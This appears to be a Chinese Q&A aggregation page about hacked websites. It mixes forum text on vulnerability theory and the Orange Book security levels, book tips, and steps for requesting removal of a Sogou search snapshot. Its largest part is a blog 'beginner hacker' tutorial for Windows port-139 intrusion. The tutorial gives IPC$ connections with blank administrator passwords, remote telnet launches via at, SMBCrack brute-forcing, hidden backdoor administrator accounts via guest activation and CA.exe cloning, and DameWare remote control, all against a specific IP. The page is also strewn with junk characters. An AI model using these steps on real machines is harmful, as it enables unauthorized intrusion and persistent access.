本文目录一览:
我这网站被入侵了,是程序漏洞还是空间服务器被入侵了?
程序漏洞!漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。具体举例来说,比如在Intel Pentium芯片中存在的逻辑错误,在Sendmail早
期版本中的编程错误,在NFS协议中认证方式上的弱点,在Unix系统管理员设置匿名Ftp服务时配置不当的问题都可能被攻击者使用,威胁到系统的安全。因而这些都可以认为是系统中存在的安全漏洞。 7}^~
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 [,
漏洞与具体系统环境之间的关系及其时间相关特性 4O.,U6
漏洞会影响到很大范围的软硬件设备,包括作系统本身及其支撑软件,网络客户和服务器软件,网络路由器和安全防火墙等。换而言之,在这些不同的软硬件设备中都可能存在不同的安全漏洞问题。在不同种类的软、硬件设备,同种设备的不同版本之间,由不同设备构成的不同系统之间,以及同种系统在不同的设置条件下,都会存在各自不同的安全漏洞问题。 ut](
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 ^Fwl
漏洞问题是与时间紧密相关的。一个系统从发布的那一天起,随着用户的深入使用,系统中存在的漏洞会被不断暴露出来,这些早先被发现的漏洞也会不断被系统供应商发布的补丁软件修补,或在以后发布的新版系统中得以纠正。而在新版系统纠正了旧版本中具有漏洞的同时,也会引入一些新的漏洞和错误。因而随着时间的推移,旧的漏洞会不断消失,新的漏洞会不断出现。漏洞问题也会长期存在。 c
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 ow?jl
因而脱离具体的时间和具体的系统环境来讨论漏洞问题是毫无意义的。只能针对目标系统的作系统版本、其上运行的软件版本以及服务运行设置等实际环境来具体谈论其中可能存在的漏洞及其可行的解决办法。 R9Y:i
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 @d
同时应该看到,对漏洞问题的研究必须要跟踪当前最新的计算机系统及其安全问题的最新发展动态。这一点如同对计算机病毒发展问题的研究相似。如果在工作中不能保持对新技术的跟踪,就没有谈论系统安全漏洞问题的发言权,既使是以前所作的工作也会逐渐失去价值。 ?HRQ
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 C$Vw
二、漏洞问题与不同安全级别计算机系统之间的关系 K /y?"
目前计算机系统安全的分级标准一般都是依据“橘皮书”中的定义。橘皮书正式名称是“受信任计算机系统评量基准”(Trusted Computer System Evaluation Criteria)。橘皮书中对可信任系统的定义是这样的:一个由完整的硬件及软件所组成的系统,在不违反访问权限的情况下,它能同时服务于不限定个数的用户,并处理从一般机密到最高机密等不同范围的信息。 |V$,
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 81vVT
橘皮书将一个计算机系统可接受的信任程度加以分级,凡符合某些安全条件、基准规则的系统即可归类为某种安全等级。橘皮书将计算机系统的安全性能由高而低划分为A、B、C、D四大等级。其中: 92.us
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 1`e
D级——最低保护(Minimal Protection),凡没有通过其他安全等级测试项目的系统即属于该级,如Dos,Windows个人计算机系统。 ]Zl
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 LSI'fr
C级——自主访问控制(Discretionary Protection),该等级的安全特点在于系统的客体(如文件、目录)可由该系统主体(如系统管理员、用户、应用程序)自主定义访问权。例如:管理员可以决定系统中任意文件的权限。当前Unix、Linux、Windows NT等作系统都为此安全等级。 TKGp,[
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 x
B级——强制访问控制(Mandatory Protection),该等级的安全特点在于由系统强制对客体进行安全保护,在该级安全系统中,每个系统客体(如文件、目录等资源)及主体(如系统管理员、用户、应用程序)都有自己的安全标签(Security Label),系统依据用户的安全等级赋予其对各个对象的访问权限。 L)
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 zC
A级——可验证访问控制(Verified Protection),而其特点在于该等级的系统拥有正式的分析及数学式方法可完全证明该系统的安全策略及安全规格的完整性与一致性。 '
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 5
可见,根据定义,系统的安全级别越高,理论上该系统也越安全。可以说,系统安全级别是一种理论上的安全保证机制。是指在正常情况下,在某个系统根据理论得以正确实现时,系统应该可以达到的安全程度。 Ou@
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 8*DX_
系统安全漏洞是指可以用来对系统安全造成危害,系统本身具有的,或设置上存在的缺陷。总之,漏洞是系统在具体实现中的错误。比如在建立安全机制中规划考虑上的缺陷,作系统和其他软件编程中的错误,以及在使用该系统提供的安全机制时人为的配置错误等。 Yu
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 uv?
安全漏洞的出现,是因为人们在对安全机制理论的具体实现中发生了错误,是意外出现的非正常情况。而在一切由人类实现的系统中都会不同程度的存在实现和设置上的各种潜在错误。因而在所有系统中必定存在某些安全漏洞,无论这些漏洞是否已被发现,也无论该系统的理论安全级别如何。 vT
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 \
所以可以认为,在一定程度上,安全漏洞问题是独立于作系统本身的理论安全级别而存在的。并不是说,系统所属的安全级别越高,该系统中存在的安全漏洞就越少。 N7
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 9nx';
可以这么理解,当系统中存在的某些漏洞被入侵者利用,使入侵者得以绕过系统中的一部分安全机制并获得对系统一定程度的访问权限后,在安全性较高的系统当中,入侵者如果希望进一步获得特权或对系统造成较大的破坏,必须要克服更大的障碍。 yF0#Ci
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 S$'
三、安全漏洞与系统攻击之间的关系 D/5H
系统安全漏洞是在系统具体实现和具体使用中产生的错误,但并不是系统中存在的错误都是安全漏洞。只有能威胁到系统安全的错误才是漏洞。许多错误在通常情况下并不会对系统安全造成危害,只有被人在某些条件下故意使用时才会影响系统安全。 (d\R
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 -k5yx[
漏洞虽然可能最初就存在于系统当中,但一个漏洞并不是自己出现的,必须要有人发现。在实际使用中,用户会发现系统中存在错误,而入侵者会有意利用其中的某些错误并使其成为威胁系统安全的工具,这时人们会认识到这个错误是一个系统安全漏洞。系统供应商会尽快发布针对这个漏洞的补丁程序,纠正这个错误。这就是系统安全漏洞从被发现到被纠正的一般过程。 8+b6'
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 [na/k
系统攻击者往往是安全漏洞的发现者和使用者,要对于一个系统进行攻击,如果不能发现和使用系统中存在的安全漏洞是不可能成功的。对于安全级别较高的系统尤其如此。 z.Ul
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 )P#[
系统安全漏洞与系统攻击活动之间有紧密的关系。因而不该脱离系统攻击活动来谈论安全漏洞问题。了解常见的系统攻击方法,对于有针对性的理解系统漏洞问题,以及找到相应的补救方法是十分必要的。 0}V
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 `k2G
四、常见攻击方法与攻击过程的简单描述 uNRz]N
系统攻击是指某人非法使用或破坏某一信息系统中的资源,以及非授权使系统丧失部分或全部服务功能的行为。 m*
©黑色海岸线网络安全技术论坛 -- 自由,开放,免费,共享 E-
通常可以把攻击活动大致分为远程攻击和内部攻击两种。现在随着互联网络的进步,其中的远程攻击技术得到很大发展,威胁也越来越大,而其中涉及的系统漏洞以及相关的知识也较多,因此有重要的研究价值。 jU
可以修复的,上网下载相应的补丁。对程序是没有影响的
怎么入侵网站 要怎么学? 看什么书 请进来看 内详
入侵网站就是脚本入侵,给你推荐几本脚本入侵方面的书,我也是查了好久才找到的,我现在也在学,边看教程边看书边实践,以下是这方面的书《精通脚本黑客》《黑客渗透笔记》《精通脚本黑软攻击技术.》《黑客脚本全本》。
想认证网站,需要《域名授权书》,这是怎么回事?
域名授权书是域名所有者(企业或个人)将域名授权给另外的企业或个人使用所出具的一个书面协议。主要应用于申请网站备案注册时,域名持有者和备案提交的备案主体信息不一致,我国部分省管局会要求网站备案时出具域名授权使用证明。
如何申请删除搜狗快照
1. 其中百度和360的比较简单,就填下网址,个人身份证明,再加上公司营业执照,就可以了。而最复杂的就是搜狗的快照的删除了。要求我们提供的材料众多,而且还都要自己去找,也没有模板,主要麻烦再删除申明和授权委托书上。
拿下面一个被黑网站为例:明显该网站被黑客入侵,挂了木马
2.直接点击页面下方的快照,进入快照删除更新页面,如下图
3.选择删除快照,然后填写要删除的URL快照地址,一次最多可以填9个
4.添加附件,个人的比较简单,就身份证,而单位的就比较多了,不仅身份证的正反面,营业执照,还要删除申明和授权委托书。具体如下
5.所有的图片大小不超过600K
6.网站授权委托书——注意下面格式:
要有授权人身份证编号(没有不予通过),授权有效期,公司名称,
法人代表签字还有盖章。
7.删除申明,需要有:
(1)这一句话:本公司承担由删除快照引起的相应的
一切法律责任,否则不予通过(我试过的).
(2)标注:公司名称,公司盖章,日期
8.提交成功会有如下提示
9
9.三天之内会有答复,一般会发邮件通知你。
侵入网站该看什么书
黑客新手教程--入侵
2006-11-12 08:42:34 / 天气: 晴朗 / 心情: 高兴
我的日志
对于刚刚学习黑客技术的朋友,时常会觉得无从下手,网上的教程满天飞,但即实用又贴近初学者的却不多,我现在就来讲讲通过139端口的入侵。考虑到大家可能对许多相关知识并不熟悉,因此我的文章分为两个部份:第一部份是相关知识的介绍,第二部份是通过一次实例,详细讲述入侵过程和各种命令的运用。现在,let's go。
5e@pf9~)I0 第一部份:知识介绍爱好者博墅M t8pM+bnX,_
(1)什么是端口
i;eSN#v)Mf0 端口是各种程序为了接收和发送数据而开的“窗户”,程序需要它来与外界进行通讯,你可以把它想象成一个邮箱,我要传递消息给你,我就会把消息放到你的邮箱里。你要得到消息,你只需要打开邮箱把消息拿出来。同样,别的计算机为了和你的机器通讯,会把数据发到你的机器的端口上,计算机读取端口就可以得到数据。
0qn$jxW8R'h0 (2)端口是唯一的吗?
d h S F~p1j Q+Z0K0 端口不是唯一的。端口分两种:TCP端口和UDP端口,每种端口最多有65535个,分别用自然数1~65535编号。这里我不解释TCP端口和UDP端口有什么不同,你只须要知道不同的端口对应不同的程序,每个程序只能只能读取发送到属于自己端口上的数据。举个例子,hi.exe打开TCP6500端口,如果我把数据发送到TCP6501端口或是UDP6500端口,hi.exe都接收不到,只有发送到TCP6500端口的数据hi.exe才能接收。爱好者博墅t@#gN1P1BBS]
(3)TCP139端口的作用
\+g6k@"]0 TCP139是用于网络共享的端口,只有当一台计算机开放了TCP139端口时别的计算机才能访问其上的共享文件。但是在Windows 2000/ NT/ XP中,TCP139端口还有一个重要的作用:远程管理连接(IPC$,Admin$),这是微软为了方便管理员对远程计算机的管理而特意设置的。为了能够成功地建立IPC$(远程管理)连接,你需要管理员的用户名和密码,这也是基于139端口入侵的重点,只要我们得到了远程计算机的密码,再通过139端口进行IPC$连接,我们就完全控制了远程的计算机。
nSl;c)x_}y0 (4)必要命令的详解和相关工具的使用
st q'l(@SrC0b0 首先必须说明,为了你能在黑客道路上成长起来,拆了你的Win98,装上Windows2000吧,以下我所写的命令和工具大多仅适用于Windows2000/ NT/ XP。
P @7i~]4W0 点击开始→运行,输入cmd.exe,跳出一个命令行窗口,你可得熟悉它,因为入侵时95%的工作都是在这里完成的。现在,我来介绍成功进行139入侵的几个必要命令:dir,cd,del,copy,net,at。
4p"g,r@duS5|0 dir的作用是列出指定路径下的目录和文件,输入c:\dir c:\ 就会列出C盘下的所有目录和文件,dir c:\winnt\ 列出C盘下winnt文件夹下的目录和文件。dir有3个常用的参数 /p,/a,/s, /p是用来分屏显示列出的文件的,通常某个目录下文件很多,一个屏幕显示不下,我们就会用到/p 如dir c:\ /p。/a是用来显示隐藏的文件、目录的,在Windows里设置一个文件属性为隐藏(假设此文件为c:\a.txt),然后在命令行下输入dir c:\a.txt,你会发现系统告诉你找不到此文件(file not fount),而输入dir c:\a.txt /a,你就可以看到隐藏的a.txt了。/s是在入侵时非常有用的一个参数,作用是搜索当前驱动器(C盘,D盘……),查找指定文件。比如我要删除对方的主页文件index.asp,但不知到这个文件的位置,我们就可以利用dir index.asp /s在各个分区下进行搜索。
C['_^}9U A^0 cd的作用是进入目录,cd c:\winnt\system32 就到了system32目录之中了。不信你可以用dir和dir c:\winnt\system32,得到的结果是一样的,如果你要切换分区,c:\d: 就到了D盘下了,而不用cd d:,这点要注意。爱好者博墅/@Kb/HL;t ?5Q
del的作用是删除文件,del c:\a.txt 就把a.txt 给删了。
;}D |0uU3w0 copy的作用是拷贝文件,这个命令很重要,一定要熟练掌哦。copy c:\a.txt d:\mp3\b.txt 把C盘下的a.txt拷到D盘下的mp3目录下,并重命名为b.txt,注意哦,copy后的文件类型可以是任意的,copy c:\a.exe 就把文件类型改成了可执行文件。当然,a.exe 不会正常运行。爱好者博墅!r` z Bz1IVS Fx
net 命令是139端口入侵的重中之重,整个入侵过程会多次用到它。在命令行窗口下输入net,可以看到有一大堆参数,别被这一大堆参数吓怀了,现在我来为你一一讲解。
s C+Ay5? Y.}y0 net use
'qFqi ve0net use 命令用于与远程主机建立IPC$(管理)连接,当你有远程计算机的用户名(通常用户名为administrator,记住它)和密码时,在命令行窗口下输入net use\\IP\IPC$"password"/user:administrator,你就成功地建立了与远程计算机的连接。在这之后,可以对其进行管理了。net use 还有一个用处,即映射远程机器的共享资源,输入net use z: \\IP\C$ (注意!在此之后的一切命令都是基于第一个命令的,也就是说必须先建立IPC$连接后,这些命令才会成功),打开“我的电脑”,你会发现多了一个Z盘,里面全是远程主机C盘下的东西,你在Z盘里删除了一个文件,对方C盘下的这个文件就也被删除了,所有对Z盘的操作其实就是对远程计算机的C 盘的操作。怎么样,是不是很有意思呢?爱好者博墅/^)o!e]L6{2z
net view爱好者博墅/v-o?MN'I.H
net view 用于查看远程计算机有哪些共享资源,通常你会看到my document之类的共享文件夹,输入net view \\IP即可。我个人认为net view 没有太大用处,要知道,在Windows2000中,各个硬盘都是共享的,但是如果你用net view 来查看,你会发现并无C,D,E 之类的共享资源。这是为什么呢?注意,在这之前的一些命令中,我们曾输入过IPC$,C$这样的奇怪东西,其实,Windows2000中,带"$"后缀的共享资源是隐藏的,在命令行窗口下是无法看到的,Windows2000中各个盘都是以诸如C$,D$,E$ 这样的名称共享的,所以我们看不到,但确实存在,IPC$也是如此。爱好者博墅 J+NAy?sFt9F#Q
net share
*Y,\ IP"h.?;I8l~ H0net share 用于开放共享,输入net share QQ=c:\tencent,你会发现多了一个名为QQ的共享资源。这个命令有慎么作用呢?假设一个主机安全做的不错,关闭了IPC$,C$,D$ 等共享,那么我们就无法在139端口上建立管理连接,也无法访问对方的C盘,当我们通过别的手段进入后(如远程溢出),我们就可以用net share 开放IPC$,从而转为熟悉的139端口的入侵,开放IPC$ 的命令为net share IPC$。相应的,如果你想关闭共享,你可以加上/del 后缀,例如net share c$ /del 就关闭了C盘的共享。爱好者博墅%b`rn0ja
net user爱好者博墅"q"R7p Qy"EO
net user 命令用于管理主机上的用户,仅输入不带任何参数的net user 会列出计算机上所有的用户名。现在就让我们看看net user 命令是如何对用户进行操作的。 爱好者博墅8y1d.Ur}kUs X
6yYI#czO0 ┃ net user hacker 12345 /add 建立一个名为hacker,密码为12345的用户。 ┃
4LFNKBuV*v0 ┃ net user hacker /del 删除名为hacker的用户。 ┃ 爱好者博墅9iY%U1fI9Q;ypb'E
┃ net user hacker /active:no 禁用hacker这个用户,这个用户不能再登陆此计算机。 ┃爱好者博墅1C0q@ w[,zq*qR
┃ net user hacker /active:yes 激活已禁用的hacker这个用户。 ┃ 爱好者博墅;o#\4d#c;H,G
┃ net localgroup administrator hacker /add 把hacker这个用户添加进管理员组,即提升hacker的权限,使之变为管理员 ┃
L5B.S XzK~"r%qO0┖———————————————————————————————————————————————————————┚
3\|;h aU,]0net start / net stop
iC!ok n0net start / net stop 命令用于起动/停止系统服务,通常我们会net stop w3svc (停止网页服务),然后替换网页,对此命令我不多讲,知道即可。爱好者博墅"`k,H5au'S;O;U
*at 命令,net time
"g|?\f;VJ0之所以把它们放在一起来讲,是因为at命令要用到net time命令的结果,一般我们先 net view \\ip,得到远程主机的时间(假设得到的时间为9:00),然后at \\ip 9:00 telnet 就启动了telnet服务,at这个命令就是用来远程运行程序的.
(5)需要准备的工具
p'ZXeY5z"j0 肉鸡猎手v1.0 扫描一个网段,找出弱密码的计算机爱好者博墅v8|+rMNO4YYFus
SMBCrack 针对特定主机,暴力猜解密码爱好者博墅 ^,f]cRs+n
DameWare Mini Remote Control 监控运程屏幕
~f9b fy#i"o0 CA.exe 克隆管理员账号
第二部份:入侵实例
,Kz/K ?#Hbw/k0今天打星际,被一高手反复摧残,郁闷ing……于是上网活动一下。打开肉鸡猎手,在开始IP和结束IP中填入想扫描的IP端,点击开始,不一会儿之后,两台肉鸡出现在我们面前(图一)。现在,让我们点击“开始”→“运行”→cmd.exe,打开可爱的命令行窗口。输入:net use \\218.80.236.37\IPC$ "" /user:administrator,提示“命令成功完成”。哈哈,现在我们就建立好了IPC$(远程管理连接),再来,取得远程主机时间:net time \\218.80.236.37 显示: \\218.80.236.37 的当前时间是 2003/5/22 上午 10:32。然后用at命令启动远程主机的telent服务,at \\218.80.236.37 10:32 telent,方便我们登陆远程主机。(注意! 建立IPC$连接和登陆远程主机是截然不同的两个概念,建立IPC$是为了能够使用at 命令来启动telent服务,几乎所有的命令都是在登陆远程主机之后使用,否则都是对你自己的计算机操作。)然后,telent 218.80.236.37 23,出现如图提示窗口(图二),敲入administrator 回车两次,出现了命令提示符,现在开始我们敲入的命令都会在远程计算机上执行。先输入net user 看看有哪些用户,这里我们只发现了administrator,guest,Iuser_KiKi三个用户,考虑到下次进入该主机时用户可能已经更改了administrator 的密码,为了能够顺利地再次进入,我们需要留下一个小后门。通常我们会这样做,输入net user guest/active:yes 激活guest 用户(guest用户系统内置的,因此每台计算机上都有,默认禁用此用户)。net user guest 12345 更改guest的密码为12345,net localgroup administrators guest /add 把guest的权限提升为管理员权限,这样下次来的时后可以取得对远程主机的完全控制权。留好了后门之后,你可以好好地在他的机子上逛一圈,看看有没有什么有趣的东西,顺便把你刚学的命临实际操作一下。如果你觉得命令行实在不方便,那么跟我来,我将带你进入丰富多采的图形界面。现在,在命临行窗口下输入exit,显示“断开远程主机的连接”,我们用exit这个命令离开了远程主机,回到自己的机器上,点击载下来的DameWare,出现如图所示界面(图三),在"host name"里填上对方IP,输入用户名administrator和密码(现在密码为空,所以不填),点击"Connect",然后等待DameWare拷贝文件,启动服务等一系列动作完成。一会而之后,出现如图(图四)窗口,里面现示的就是远程主机的桌面,别人的一举一动你都可以看见,你还可以接管他的鼠标,是不是挺有意思的呢?但是记住,我们是来学习技术的,并不是来破坏的,所以千万别做什么坏事哦。爱好者博墅"W e!Y8De
文章写到这里就告一段落了,其实对于入侵实例,有几点我想特别提一下:
#s3c#J7{6`DoD0 (1)肉鸡猎手只能搜密码为空的主机,所以只能一开始让我们练练手。一般要对139端口攻击,我们使用SMBCrack这个软件,它是针对一台主机进行密码的暴力猜解的,速度非常快,在我机器上猜了24万个密码只用了半小时左右,命令行窗口下输入smbcrack 218.80.236.37 administrator words.txt 139 就开始猜解密码了。218.80.236.37这里改为你要攻击的IP,words.txt是字典,里面含有很多口令,你可以自己上网找找,好的字典能提高入侵的成功率。爱好者博墅-B4ejtb'a-S0Dr$A
(2)telent上对方的机器后,我们为了更加隐蔽地留下后门,常常使用CA.exe,CA是(clone administrator)的缩写,看名字你就应该知道,它可以把其它用户克隆成管理员,CA.exe \\218.80.236.37 Administrator Password IUSR_VICTIM SetNewPass,把IUSR_VICTIM克隆成为管理员,密码是SetNewPass,克隆完成之后,一般是无法发现的,所以隐蔽性非常高。爱好者博墅.d Yk$RrIC9?
(3)at 这个命令有点搞笑,很多人先net view \\IP 看了时间后,再用at 来启动对方程序却常常失败,这是因为很多人都不知道,用net view \\IP 得到的时间不能直接用于at,这涉及到+12的问题,如果你看到对方的时间是 下午 3:00,那么at 应该这样使用at \\IP 15:00 telent。爱好者博墅8C,Q7Jr*M
好了,就说到这里了。相信看了本文之后,各位都能够成功地对139端口进行入侵,至于进去之后做什么,各位就自己发挥吧。
入侵网站后台原理小介一下
有一本书好像不错的,买来看看吧《黑客攻防宝典》
1.可能你的网站程序存在漏洞 能被人直接利用漏洞入侵!
2. 就是经常说的旁注入侵!如果你的网站和别的很多网站放在同一个服务器上,而且这个服务器没设置好!那么别人可以通过入侵同一服务器上别人的网站 然后控制整个服务器就可以达到入侵你网站的目的
就像1楼说的,这个不是这么简单就能说清楚的。得慢慢学